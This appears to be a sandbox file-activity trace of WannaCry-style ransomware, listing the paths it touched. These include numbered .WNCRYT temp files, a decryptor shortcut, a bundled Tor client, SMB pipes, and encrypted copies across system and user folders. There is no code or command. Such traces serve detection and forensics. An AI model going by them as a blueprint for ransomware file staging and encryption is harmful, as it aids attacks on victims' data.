C:\Users\user\AppData\Local\Temp\274.WNCRYT
C:\Users\user\AppData\Local\Temp\275.WNCRYT
C:\Users\user\AppData\Local\Temp\276.WNCRYT
C:\Users\user\AppData\Local\Temp\277.WNCRYT
C:\Users\user\AppData\Local\Temp\278.WNCRYT
C:\Users\user\AppData\Local\Temp\279.WNCRYT
C:\Users\user\AppData\Local\Temp\280.WNCRYT
C:\Users\user\AppData\Local\Temp\281.WNCRYT
C:\Users\user\AppData\Local\Temp\282.WNCRYT
C:\Users\user\AppData\Local\Temp\283.WNCRYT
C:\Users\user\AppData\Local\Temp\284.WNCRYT
C:\Users\user\AppData\Local\Temp\285.WNCRYT
C:\Users\user\AppData\Local\Temp\286.WNCRYT
C:\Users\user\AppData\Local\Temp\287.WNCRYT
C:\Users\user\AppData\Local\Temp\288.WNCRYT
C:\Users\user\AppData\Local\Temp\289.WNCRYT
C:\Users\user\AppData\Local\Temp\290.WNCRYT
C:\Users\user\AppData\Local\Temp\291.WNCRYT
C:\Users\user\AppData\Local\Temp\292.WNCRYT
C:\Users\user\AppData\Local\Temp\293.WNCRYT
C:\Users\user\AppData\Local\Temp\294.WNCRYT
C:\Users\user\AppData\Local\Temp\295.WNCRYT
C:\Users\user\AppData\Local\Temp\296.WNCRYT
C:\Users\user\AppData\Local\Temp\297.WNCRYT
C:\Users\user\AppData\Local\Temp\298.WNCRYT
C:\Users\user\AppData\Local\Temp\299.WNCRYT
C:\Users\user\AppData\Local\Temp\300.WNCRYT
C:\Users\user\AppData\Local\Temp\301.WNCRYT
C:\Users\user\AppData\Local\Temp\302.WNCRYT
C:\Users\user\AppData\Local\Temp\303.WNCRYT
C:\Users\user\AppData\Local\Temp\304.WNCRYT
C:\Users\user\AppData\Local\Temp\305.WNCRYT
C:\Users\user\AppData\Local\Temp\306.WNCRYT
C:\Users\user\AppData\Local\Temp\307.WNCRYT
C:\Users\user\AppData\Local\Temp\308.WNCRYT
C:\Users\user\AppData\Local\Temp\309.WNCRYT
C:\Users\user\AppData\Local\Temp\310.WNCRYT
C:\Users\user\AppData\Local\Temp\311.WNCRYT
C:\Users\user\AppData\Local\Temp\312.WNCRYT
C:\Users\user\AppData\Local\Temp\313.WNCRYT
C:\Users\user\AppData\Local\Temp\314.WNCRYT
C:\Users\user\AppData\Local\Temp\315.WNCRYT
C:\Users\user\AppData\Local\Temp\316.WNCRYT
C:\Users\user\AppData\Local\Temp\317.WNCRYT
C:\Users\user\AppData\Local\Temp\318.WNCRYT
C:\Users\user\AppData\Local\Temp\319.WNCRYT
C:\Users\user\AppData\Local\Temp\320.WNCRYT
C:\Users\user\AppData\Local\Temp\321.WNCRYT
C:\Users\user\AppData\Local\Temp\322.WNCRYT
C:\Users\user\AppData\Local\Temp\323.WNCRYT
C:\Users\user\AppData\Local\Temp\324.WNCRYT
C:\Users\user\AppData\Local\Temp\325.WNCRYT
C:\Users\user\AppData\Local\Temp\326.WNCRYT
C:\Users\user\AppData\Local\Temp\327.WNCRYT
C:\Users\user\AppData\Local\Temp\328.WNCRYT
C:\Users\user\AppData\Local\Temp\329.WNCRYT
C:\Users\user\AppData\Local\Temp\330.WNCRYT
C:\Users\user\AppData\Local\Temp\331.WNCRYT
C:\Users\user\AppData\Local\Temp\332.WNCRYT
C:\Users\user\AppData\Local\Temp\333.WNCRYT
C:\Users\user\AppData\Local\Temp\334.WNCRYT
C:\Users\user\AppData\Local\Temp\335.WNCRYT
C:\Users\user\AppData\Local\Temp\336.WNCRYT
C:\Users\user\AppData\Local\Temp\337.WNCRYT
C:\Users\user\AppData\Local\Temp\338.WNCRYT
C:\Users\user\AppData\Local\Temp\339.WNCRYT
C:\Users\user\AppData\Local\Temp\340.WNCRYT
C:\Users\user\AppData\Local\Temp\341.WNCRYT
C:\Users\user\AppData\Local\Temp\342.WNCRYT
C:\Users\user\AppData\Local\Temp\343.WNCRYT
C:\Users\user\AppData\Local\Temp\344.WNCRYT
C:\Users\user\AppData\Local\Temp\345.WNCRYT
C:\Users\user\AppData\Local\Temp\346.WNCRYT
C:\Users\user\AppData\Local\Temp\347.WNCRYT
C:\Users\user\AppData\Local\Temp\348.WNCRYT
C:\Users\user\AppData\Local\Temp\349.WNCRYT
C:\Users\user\AppData\Local\Temp\350.WNCRYT
C:\Users\user\AppData\Local\Temp\351.WNCRYT
C:\Users\user\AppData\Local\Temp\352.WNCRYT
C:\Users\user\AppData\Local\Temp\353.WNCRYT
C:\Users\user\AppData\Local\Temp\354.WNCRYT
C:\Users\user\AppData\Local\Temp\355.WNCRYT
C:\Users\user\AppData\Local\Temp\356.WNCRYT
C:\Users\user\AppData\Local\Temp\357.WNCRYT
C:\Users\user\AppData\Local\Temp\358.WNCRYT
C:\Users\user\AppData\Local\Temp\359.WNCRYT
C:\Users\user\AppData\Local\Temp\360.WNCRYT
C:\Users\user\AppData\Local\Temp\361.WNCRYT
C:\Users\user\AppData\Local\Temp\362.WNCRYT
C:\Users\user\AppData\Local\Temp\363.WNCRYT
C:\Users\user\AppData\Local\Temp\364.WNCRYT
C:\Users\user\AppData\Local\Temp\365.WNCRYT
C:\Users\user\AppData\Local\Temp\366.WNCRYT
C:\Users\user\AppData\Local\Temp\367.WNCRYT
C:\Users\user\AppData\Local\Temp\368.WNCRYT
C:\Users\user\AppData\Local\Temp\369.WNCRYT
C:\Users\user\AppData\Local\Temp\370.WNCRYT
C:\Users\user\AppData\Local\Temp\371.WNCRYT
C:\Users\user\AppData\Local\Temp\372.WNCRYT
C:\Users\user\AppData\Local\Temp\373.WNCRYT
C:\Users\user\AppData\Local\Temp\374.WNCRYT
C:\Users\user\AppData\Local\Temp\375.WNCRYT
C:\Users\user\AppData\Local\Temp\376.WNCRYT
C:\Users\user\AppData\Local\Temp\377.WNCRYT
C:\Users\user\AppData\Local\Temp\378.WNCRYT
C:\Users\user\AppData\Local\Temp\379.WNCRYT
C:\Users\user\AppData\Local\Temp\380.WNCRYT
C:\Users\user\AppData\Local\Temp\381.WNCRYT
C:\Users\user\AppData\Local\Temp\382.WNCRYT
C:\Users\user\AppData\Local\Temp\383.WNCRYT
C:\Users\user\AppData\Local\Temp\384.WNCRYT
C:\Users\user\AppData\Local\Temp\385.WNCRYT
C:\Users\user\AppData\Local\Temp\386.WNCRYT
C:\Users\user\AppData\Local\Temp\387.WNCRYT
C:\Users\user\AppData\Local\Temp\388.WNCRYT
C:\Users\user\AppData\Local\Temp\389.WNCRYT
C:\Users\user\AppData\Local\Temp\390.WNCRYT
C:\Users\user\AppData\Local\Temp\391.WNCRYT
C:\Users\user\AppData\Local\Temp\392.WNCRYT
C:\Users\user\AppData\Local\Temp\393.WNCRYT
C:\Users\user\AppData\Local\Temp\394.WNCRYT
C:\Users\user\AppData\Local\Temp\395.WNCRYT
C:\Users\user\AppData\Local\Temp\396.WNCRYT
C:\Users\user\AppData\Local\Temp\397.WNCRYT
C:\Users\user\AppData\Local\Temp\398.WNCRYT
C:\Users\user\AppData\Local\Temp\399.WNCRYT
C:\Users\user\AppData\Local\Temp\400.WNCRYT
C:\Users\user\AppData\Local\Temp\401.WNCRYT
C:\Users\user\AppData\Local\Temp\402.WNCRYT
C:\Users\user\AppData\Local\Temp\403.WNCRYT
C:\Users\user\AppData\Local\Temp\404.WNCRYT
C:\Users\user\AppData\Local\Temp\405.WNCRYT
C:\Users\user\AppData\Local\Temp\406.WNCRYT
C:\Users\user\AppData\Local\Temp\407.WNCRYT
C:\Users\user\AppData\Local\Temp\408.WNCRYT
C:\Users\user\AppData\Local\Temp\409.WNCRYT
C:\Users\user\AppData\Local\Temp\410.WNCRYT
C:\Users\user\AppData\Local\Temp\411.WNCRYT
C:\Users\user\AppData\Local\Temp\412.WNCRYT
C:\Users\user\AppData\Local\Temp\413.WNCRYT
C:\Users\user\AppData\Local\Temp\414.WNCRYT
C:\Users\user\AppData\Local\Temp\415.WNCRYT
C:\Users\user\AppData\Local\Temp\416.WNCRYT
C:\Users\user\AppData\Local\Temp\417.WNCRYT
C:\Users\user\AppData\Local\Temp\418.WNCRYT
C:\Users\user\AppData\Local\Temp\419.WNCRYT
C:\Users\user\AppData\Local\Temp\420.WNCRYT
C:\Users\user\AppData\Local\Temp\421.WNCRYT
C:\Users\user\AppData\Local\Temp\422.WNCRYT
C:\Users\user\AppData\Local\Temp\423.WNCRYT
C:\Users\user\AppData\Local\Temp\424.WNCRYT
C:\Users\user\AppData\Local\Temp\425.WNCRYT
C:\Users\user\AppData\Local\Temp\426.WNCRYT
C:\Users\user\AppData\Local\Temp\427.WNCRYT
C:\Users\user\AppData\Local\Temp\428.WNCRYT
C:\Users\user\AppData\Local\Temp\429.WNCRYT
C:\Users\user\AppData\Local\Temp\430.WNCRYT
C:\Users\user\AppData\Local\Temp\431.WNCRYT
C:\Users\user\AppData\Local\Temp\432.WNCRYT
C:\Users\user\AppData\Local\Temp\433.WNCRYT
C:\Users\user\AppData\Local\Temp\434.WNCRYT
C:\Users\user\AppData\Local\Temp\435.WNCRYT
C:\Users\user\AppData\Local\Temp\436.WNCRYT
C:\Users\user\AppData\Local\Temp\437.WNCRYT
C:\Users\user\AppData\Local\Temp\438.WNCRYT
C:\Users\user\AppData\Local\Temp\439.WNCRYT
C:\Users\user\AppData\Local\Temp\440.WNCRYT
C:\Users\user\AppData\Local\Temp\441.WNCRYT
C:\Users\user\AppData\Local\Temp\442.WNCRYT
C:\Users\user\AppData\Local\Temp\443.WNCRYT
C:\Users\user\AppData\Local\Temp\444.WNCRYT
C:\Users\user\AppData\Local\Temp\445.WNCRYT
C:\Users\user\AppData\Local\Temp\446.WNCRYT
C:\Users\user\AppData\Local\Temp\447.WNCRYT
C:\Users\user\AppData\Local\Temp\448.WNCRYT
C:\Users\user\AppData\Local\Temp\449.WNCRYT
C:\Users\user\AppData\Local\Temp\450.WNCRYT
C:\Users\user\AppData\Local\Temp\451.WNCRYT
C:\Users\user\AppData\Local\Temp\452.WNCRYT
C:\Users\user\AppData\Local\Temp\453.WNCRYT
C:\Users\user\AppData\Local\Temp\454.WNCRYT
C:\Users\user\AppData\Local\Temp\455.WNCRYT
C:\Users\user\AppData\Local\Temp\456.WNCRYT
C:\Users\user\AppData\Local\Temp\457.WNCRYT
C:\Users\user\AppData\Local\Temp\458.WNCRYT
C:\Users\user\AppData\Local\Temp\459.WNCRYT
C:\Users\user\AppData\Local\Temp\460.WNCRYT
C:\Users\user\AppData\Local\Temp\461.WNCRYT
C:\Users\user\AppData\Local\Temp\462.WNCRYT
C:\Users\user\AppData\Local\Temp\463.WNCRYT
C:\Users\user\AppData\Local\Temp\464.WNCRYT
C:\Users\user\AppData\Local\Temp\465.WNCRYT
C:\Users\user\AppData\Local\Temp\466.WNCRYT
C:\Users\user\AppData\Local\Temp\467.WNCRYT
C:\Users\user\AppData\Local\Temp\468.WNCRYT
C:\Users\user\AppData\Local\Temp\469.WNCRYT
C:\Users\user\AppData\Local\Temp\470.WNCRYT
C:\Users\user\AppData\Local\Temp\471.WNCRYT
C:\Users\user\AppData\Local\Temp\472.WNCRYT
C:\Users\user\AppData\Local\Temp\473.WNCRYT
C:\Users\user\AppData\Local\Temp\474.WNCRYT
C:\Users\user\AppData\Local\Temp\475.WNCRYT
C:\Users\user\AppData\Local\Temp\476.WNCRYT
C:\Users\user\AppData\Local\Temp\477.WNCRYT
C:\Users\user\AppData\Local\Temp\478.WNCRYT
C:\Users\user\AppData\Local\Temp\479.WNCRYT
C:\Users\user\AppData\Local\Temp\480.WNCRYT
C:\Users\user\AppData\Local\Temp\481.WNCRYT
C:\Users\user\AppData\Local\Temp\482.WNCRYT
C:\Users\user\AppData\Local\Temp\483.WNCRYT
C:\Users\user\AppData\Local\Temp\484.WNCRYT
C:\Users\user\AppData\Local\Temp\485.WNCRYT
C:\Users\user\AppData\Local\Temp\486.WNCRYT
C:\Users\user\AppData\Local\Temp\487.WNCRYT
C:\Users\user\AppData\Local\Temp\488.WNCRYT
C:\Users\user\AppData\Local\Temp\489.WNCRYT
C:\Users\user\AppData\Local\Temp\490.WNCRYT
C:\Users\user\AppData\Local\Temp\491.WNCRYT
C:\Users\user\AppData\Local\Temp\492.WNCRYT
C:\Users\user\AppData\Local\Temp\493.WNCRYT
C:\Users\user\AppData\Local\Temp\494.WNCRYT
C:\Users\user\AppData\Local\Temp\495.WNCRYT
C:\Users\user\AppData\Local\Temp\496.WNCRYT
C:\Users\user\AppData\Local\Temp\497.WNCRYT
C:\Users\user\AppData\Local\Temp\498.WNCRYT
C:\Users\user\AppData\Local\Temp\499.WNCRYT
C:\Users\user\AppData\Local\Temp\500.WNCRYT
C:\Users\user\AppData\Local\Temp\501.WNCRYT
C:\Users\user\AppData\Local\Temp\502.WNCRYT
C:\Users\user\AppData\Local\Temp\503.WNCRYT
C:\Users\user\AppData\Local\Temp\504.WNCRYT
C:\Users\user\AppData\Local\Temp\505.WNCRYT
C:\Users\user\AppData\Local\Temp\506.WNCRYT
C:\Users\user\AppData\Local\Temp\507.WNCRYT
C:\Users\user\AppData\Local\Temp\508.WNCRYT
C:\Users\user\AppData\Local\Temp\509.WNCRYT
C:\Users\user\AppData\Local\Temp\510.WNCRYT
C:\Users\user\AppData\Local\Temp\511.WNCRYT
C:\Users\user\AppData\Local\Temp\512.WNCRYT
C:\Users\user\AppData\Local\Temp\513.WNCRYT
C:\Users\user\AppData\Local\Temp\514.WNCRYT
C:\Users\user\AppData\Local\Temp\515.WNCRYT
C:\Users\user\AppData\Local\Temp\516.WNCRYT
C:\Users\user\AppData\Local\Temp\517.WNCRYT
C:\Users\user\AppData\Local\Temp\518.WNCRYT
C:\Users\user\AppData\Local\Temp\519.WNCRYT
C:\Users\user\AppData\Local\Temp\520.WNCRYT
C:\Users\user\AppData\Local\Temp\521.WNCRYT
C:\Users\user\AppData\Local\Temp\522.WNCRYT
C:\Users\user\AppData\Local\Temp\523.WNCRYT
C:\Users\user\AppData\Local\Temp\524.WNCRYT
C:\Users\user\AppData\Local\Temp\525.WNCRYT
C:\Users\user\AppData\Local\Temp\526.WNCRYT
C:\Users\user\AppData\Local\Temp\527.WNCRYT
C:\Users\user\AppData\Local\Temp\528.WNCRYT
C:\Users\user\AppData\Local\Temp\529.WNCRYT
C:\Users\user\AppData\Local\Temp\530.WNCRYT
C:\Users\user\AppData\Local\Temp\531.WNCRYT
C:\Users\user\AppData\Local\Temp\532.WNCRYT
C:\Users\user\AppData\Local\Temp\533.WNCRYT
C:\Users\user\AppData\Local\Temp\534.WNCRYT
C:\Users\user\AppData\Local\Temp\535.WNCRYT
C:\Users\user\AppData\Local\Temp\536.WNCRYT
C:\Users\user\AppData\Local\Temp\537.WNCRYT
C:\Users\user\AppData\Local\Temp\538.WNCRYT
C:\Users\user\AppData\Local\Temp\539.WNCRYT
C:\Users\user\AppData\Local\Temp\540.WNCRYT
C:\Users\user\AppData\Local\Temp\541.WNCRYT
C:\Users\user\AppData\Local\Temp\542.WNCRYT
C:\Users\user\AppData\Local\Temp\543.WNCRYT
C:\Users\user\AppData\Local\Temp\544.WNCRYT
C:\Users\user\AppData\Local\Temp\m.vbs
\??\PIPE\srvsvc
C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe.lnk
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db
C:\Users\user\AppData\Local\Temp\TaskData\Tor\libeay32.dll
C:\Users\user\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll
C:\Users\user\AppData\Local\Temp\TaskData\Tor\libevent_core-2-0-5.dll
C:\Users\user\AppData\Local\Temp\TaskData\Tor\libevent_extra-2-0-5.dll
C:\Users\user\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll
C:\Users\user\AppData\Local\Temp\TaskData\Tor\libssp-0.dll
C:\Users\user\AppData\Local\Temp\TaskData\Tor\ssleay32.dll
C:\Users\user\AppData\Local\Temp\TaskData\Tor\tor.exe
C:\Users\user\AppData\Local\Temp\TaskData\Tor\zlib1.dll
C:\Users\user\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
\??\PIPE\wkssvc
C:\Users\user\AppData\Roaming\tor\lock
C:\Users\user\AppData\Roaming\tor\state.tmp
\??\PIPE\samr
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
C:\Users\user\AppData\Local\Temp\USERDUM-8A61A1P-20251208-1350.log
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
C:\Users\user\AppData\Local\Temp\00000000.res
C:\Users\user\Desktop\~SD7362.tmp
C:\Users\user\Documents\~SD73C1.tmp
C:\Users\user\Documents\WindowsPowerShell\~SD73E1.tmp
C:\Users\Default\Desktop\~SD73F2.tmp
C:\Users\Default User\Desktop\~SD7412.tmp
C:\Users\Public\Desktop\~SD7432.tmp
C:\Users\Default\Documents\~SD7443.tmp
C:\Users\Default User\Documents\~SD7454.tmp
C:\Users\Public\Documents\~SD7464.tmp
C:\~SD7475.tmp
C:\$Recycle.Bin\~SD7486.tmp
C:\$Recycle.Bin\S-1-5-21-1249488040-416823385-3057894055-500\~SD74A6.tmp
C:\$Recycle.Bin\S-1-5-21-1381398318-3211537236-2227685884-1000\~SD74B6.tmp
C:\$Recycle.Bin\S-1-5-21-3047202784-114954003-3208681637-500\~SD74D7.tmp
C:\ba69bdf0a250e352360c33\~SD74E7.tmp
C:\ba69bdf0a250e352360c33\1025\~SD7508.tmp
C:\ba69bdf0a250e352360c33\1025\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1028\~SD7566.tmp
C:\ba69bdf0a250e352360c33\1028\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1029\~SD7596.tmp
C:\ba69bdf0a250e352360c33\1029\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1030\~SD75B6.tmp
C:\ba69bdf0a250e352360c33\1030\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1031\~SD75E6.tmp
C:\ba69bdf0a250e352360c33\1031\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1032\~SD7616.tmp
C:\ba69bdf0a250e352360c33\1032\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1033\~SD7627.tmp
C:\ba69bdf0a250e352360c33\1033\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1035\~SD7637.tmp
C:\ba69bdf0a250e352360c33\1035\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1036\~SD7638.tmp
C:\ba69bdf0a250e352360c33\1036\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1037\~SD7649.tmp
C:\ba69bdf0a250e352360c33\1037\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1038\~SD765A.tmp
C:\ba69bdf0a250e352360c33\1038\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1040\~SD767A.tmp
C:\ba69bdf0a250e352360c33\1040\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1041\~SD767B.tmp
C:\ba69bdf0a250e352360c33\1041\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1042\~SD767C.tmp
C:\ba69bdf0a250e352360c33\1042\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1043\~SD768D.tmp
C:\ba69bdf0a250e352360c33\1043\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1044\~SD768E.tmp
C:\ba69bdf0a250e352360c33\1044\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1045\~SD769E.tmp
C:\ba69bdf0a250e352360c33\1045\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1046\~SD76BE.tmp
C:\ba69bdf0a250e352360c33\1046\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1049\~SD76CF.tmp
C:\ba69bdf0a250e352360c33\1049\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1053\~SD76E0.tmp
C:\ba69bdf0a250e352360c33\1053\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\1055\~SD771F.tmp
C:\ba69bdf0a250e352360c33\1055\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\2052\~SD776E.tmp
C:\ba69bdf0a250e352360c33\2052\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\2070\~SD77DD.tmp
C:\ba69bdf0a250e352360c33\2070\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\3082\~SD781C.tmp
C:\ba69bdf0a250e352360c33\3082\eula.rtf.WNCRYT
C:\ba69bdf0a250e352360c33\Graphics\~SD783C.tmp
C:\ba69bdf0a250e352360c33\NetFx45\~SD783D.tmp
C:\ba69bdf0a250e352360c33\NetFx451\~SD783E.tmp
C:\ba69bdf0a250e352360c33\NetFx452\~SD784F.tmp
C:\ba69bdf0a250e352360c33\NetFx46\~SD7850.tmp
C:\ba69bdf0a250e352360c33\NetFx461\~SD7851.tmp
C:\ba69bdf0a250e352360c33\NetFx462\~SD7862.tmp
C:\ba69bdf0a250e352360c33\NetFx47\~SD7863.tmp
C:\ba69bdf0a250e352360c33\NetFx471\~SD7864.tmp
C:\ba69bdf0a250e352360c33\NetFx472\~SD7865.tmp
C:\Boot\~SD7866.tmp
C:\Boot\cs-CZ\~SD7867.tmp
C:\Boot\da-DK\~SD7868.tmp
C:\Boot\de-DE\~SD7869.tmp
C:\Boot\el-GR\~SD786A.tmp
C:\Boot\en-US\~SD787A.tmp
C:\Boot\es-ES\~SD787B.tmp
C:\Boot\fi-FI\~SD787C.tmp
C:\Boot\Fonts\~SD787D.tmp
C:\Boot\fr-FR\~SD787E.tmp
C:\Boot\hu-HU\~SD787F.tmp
C:\Boot\it-IT\~SD7880.tmp
C:\Boot\ja-JP\~SD7881.tmp
C:\Boot\ko-KR\~SD7882.tmp
C:\Boot\nb-NO\~SD7893.tmp
C:\Boot\nl-NL\~SD7894.tmp
C:\Boot\pl-PL\~SD7895.tmp
C:\Boot\pt-BR\~SD7896.tmp
C:\Boot\pt-PT\~SD7897.tmp
C:\Boot\ru-RU\~SD7898.tmp
C:\Boot\sv-SE\~SD7899.tmp
C:\Boot\tr-TR\~SD78AA.tmp
C:\Boot\zh-CN\~SD78AB.tmp
C:\Boot\zh-HK\~SD78AC.tmp
C:\Boot\zh-TW\~SD78AD.tmp
C:\PerfLogs\~SD78AE.tmp
C:\PerfLogs\Admin\~SD78AF.tmp
C:\PSTranscripts\~SD78B0.tmp
C:\PSTranscripts\20251206\~SD78B1.tmp
C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.fPMufFfM.20251206093923.txt.WNCRYT
C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.S6TbHpZ5.20251206094405.txt.WNCRYT
C:\Recovery\~SD78C1.tmp
C:\Recovery\a2711f19-5f87-11ed-b233-de933b2797ae\~SD78C2.tmp
C:\Sysmon\~SD78C3.tmp
C:\Sysmon\sysmonconfig.txt.WNCRYT
C:\Users\~SD78D4.tmp
C:\Users\All Users\~SD78D5.tmp
C:\Users\All Users\Adobe\~SD78D6.tmp
C:\Users\All Users\Adobe\ARM\~SD78D7.tmp
C:\Users\All Users\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\~SD78E7.tmp
C:\Users\All Users\Adobe\Setup\~SD78F8.tmp
C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\~SD78F9.tmp
C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\RDC\~SD78FA.tmp
C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\RDC\Transforms\~SD78FB.tmp
C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\Transforms\~SD790C.tmp
C:\Users\All Users\Boxstarter\~SD790D.tmp
C:\Users\All Users\Boxstarter\LICENSE.txt.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\~SD790E.tmp
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\~SD790F.tmp
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\~SD791F.tmp
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\~SD7920.tmp
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\~SD7941.tmp
C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\~SD7942.tmp
C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\~SD7943.tmp
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\~SD7953.tmp
C:\Users\All Users\Boxstarter\BuildPackages\~SD7954.tmp
C:\Users\All Users\chocolatey\~SD7955.tmp
C:\Users\All Users\chocolatey\CREDITS.txt.WNCRYT
C:\Users\All Users\chocolatey\.chocolatey\~SD7966.tmp
C:\Users\All Users\chocolatey\.chocolatey\7zip.22.1\~SD7976.tmp
C:\Users\All Users\chocolatey\.chocolatey\7zip.install.22.1\~SD7977.tmp
C:\Users\All Users\chocolatey\.chocolatey\adobereader.2022.003.20263\~SD7978.tmp
C:\Users\All Users\chocolatey\.chocolatey\autohotkey.install.1.1.35.00\~SD7979.tmp
C:\Users\All Users\chocolatey\.chocolatey\boxstarter.3.0.0\~SD797A.tmp
C:\Users\All Users\chocolatey\.chocolatey\boxstarter.bootstrapper.3.0.0\~SD797B.tmp
C:\Users\All Users\chocolatey\.chocolatey\boxstarter.chocolatey.3.0.0\~SD797C.tmp
C:\Users\All Users\chocolatey\.chocolatey\BoxStarter.Common.3.0.0\~SD798D.tmp
C:\Users\All Users\chocolatey\.chocolatey\Boxstarter.HyperV.3.0.0\~SD798E.tmp
C:\Users\All Users\chocolatey\.chocolatey\BoxStarter.WinConfig.3.0.0\~SD798F.tmp
C:\Users\All Users\chocolatey\.chocolatey\chocolatey-compatibility.extension.1.0.0\~SD7990.tmp
C:\Users\All Users\chocolatey\.chocolatey\chocolatey-core.extension.1.4.0\~SD79A1.tmp
C:\Users\All Users\chocolatey\.chocolatey\chocolatey-dotnetfx.extension.1.0.1\~SD79A2.tmp
C:\Users\All Users\chocolatey\.chocolatey\chocolatey-windowsupdate.extension.1.0.5\~SD79A3.tmp
C:\Users\All Users\chocolatey\.chocolatey\dotnet-5.0-runtime.5.0.13\~SD79A4.tmp
C:\Users\All Users\chocolatey\.chocolatey\dotnet-6.0-runtime.6.0.1\~SD79B4.tmp
C:\Users\All Users\chocolatey\.chocolatey\dotnet-runtime.5.0.13\~SD79B5.tmp
C:\Users\All Users\chocolatey\.chocolatey\dotnet-runtime.6.0.1\~SD79B6.tmp
C:\Users\All Users\chocolatey\.chocolatey\dotnet.5.0.13\~SD79B7.tmp
C:\Users\All Users\chocolatey\.chocolatey\dotnet.6.0.1\~SD79B8.tmp
C:\Users\All Users\chocolatey\.chocolatey\dotnetfx.4.8.0.20190930\~SD79B9.tmp
C:\Users\All Users\chocolatey\.chocolatey\Firefox.106.0.5\~SD79CA.tmp
C:\Users\All Users\chocolatey\.chocolatey\GoogleChrome.107.0.5304.88\~SD79CB.tmp
C:\Users\All Users\chocolatey\.chocolatey\jre8.8.0.351\~SD79CC.tmp
C:\Users\All Users\chocolatey\.chocolatey\KB2919355.1.0.20160915\~SD79CD.tmp
C:\Users\All Users\chocolatey\.chocolatey\KB2919442.1.0.20160915\~SD79CE.tmp
C:\Users\All Users\chocolatey\.chocolatey\KB2999226.1.0.20181019\~SD79CF.tmp
C:\Users\All Users\chocolatey\.chocolatey\KB3033929.1.0.5\~SD79D0.tmp
C:\Users\All Users\chocolatey\.chocolatey\KB3035131.1.0.3\~SD79D1.tmp
C:\Users\All Users\chocolatey\.chocolatey\KB3063858.1.0.0\~SD79D2.tmp
C:\Users\All Users\chocolatey\.chocolatey\KB3118401.1.0.5\~SD79D3.tmp
C:\Users\All Users\chocolatey\.chocolatey\OfficeProPlus2013.15.0.4827\~SD79E4.tmp
C:\Users\All Users\chocolatey\.chocolatey\openjdk.19.0.1\~SD79E5.tmp
C:\Users\All Users\chocolatey\.chocolatey\powershell-core.7.3.0-rc1\~SD79E6.tmp
C:\Users\All Users\chocolatey\.chocolatey\python3.3.8.10\~SD79E7.tmp
C:\Users\All Users\chocolatey\.chocolatey\tapwindows.9.24.2\~SD79E8.tmp
C:\Users\All Users\chocolatey\.chocolatey\vcredist140.14.32.31332\~SD79E9.tmp
C:\Users\All Users\chocolatey\.chocolatey\vcredist2005.8.0.50727.619501\~SD79EA.tmp
C:\Users\All Users\chocolatey\.chocolatey\vcredist2008.9.0.30729.616104\~SD79EB.tmp
